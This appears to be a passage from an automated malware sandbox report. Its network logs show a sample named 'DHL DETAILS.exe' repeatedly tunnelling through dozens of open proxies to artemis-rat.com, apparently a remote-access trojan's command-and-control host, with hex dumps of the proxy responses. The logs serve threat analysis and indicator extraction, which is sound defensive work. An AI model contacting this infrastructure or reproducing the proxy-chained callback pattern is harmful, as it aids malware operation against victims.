                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    331192.168.2.550927147.75.92.251100066352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.383598089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.667865992 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    332192.168.2.551187172.67.69.9806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.389959097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.544321060 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    333192.168.2.551186104.16.108.234806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.390043974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.544269085 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    334192.168.2.550904194.233.78.142357606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.403027058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.098681927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    335192.168.2.55095313.40.239.13031286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.404493093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.695316076 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    336192.168.2.5509008.213.137.15510816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.405230045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.795840979 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:17.796250105 CET44INHTTP/1.1 200 OK
                                                                                    Content-Type: text/html


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    337192.168.2.55083135.154.71.7210806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.408339977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.793512106 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    338192.168.2.550859119.3.215.4188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.413213968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    339192.168.2.55094654.38.176.200265916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.419305086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    340192.168.2.550975119.196.168.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.423124075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.741797924 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    341192.168.2.55100382.64.77.30806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.430557013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.731008053 CET555INHTTP/1.1 403 Proxy Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: Apache
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                    Content-Length: 313
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 43 6f 6e 6e 65 63 74 20 74 6f 20 72 65 6d 6f 74 65 20 6d 61 63 68 69 6e 65 20 62 6c 6f 63 6b 65 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Proxy Error</title></head><body><h1>Proxy Error</h1><p>You don't have permission to access this resource.The proxy server could not handle the request<p>Reason: <strong>Connect to remote machine blocked</strong></p></p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    342192.168.2.550979162.55.87.4855666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.437483072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.751759052 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    343192.168.2.550043162.240.72.139206146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.437611103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.567580938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.568129063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.567614079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.677552938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    344192.168.2.55093577.91.74.77806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.439235926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.774830103 CET129INHTTP/1.1 301 Moved Permanently
                                                                                    Location: https://artemis-rat.com:443
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    345192.168.2.550919103.189.116.10880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.440666914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.007668018 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    346192.168.2.55091091.134.140.160496876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.468400955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.223684072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.333098888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    347192.168.2.55116151.79.87.144543956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.468511105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    348192.168.2.55097245.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.468609095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    349192.168.2.550932185.81.153.16233896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.468657970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    350192.168.2.55098943.131.248.165156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469099998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    351192.168.2.551236104.17.171.79806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469475985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.624007940 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    352192.168.2.550938222.223.103.23273026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469544888 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:13.819322109 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    353192.168.2.551244185.238.228.202806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:13.469634056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
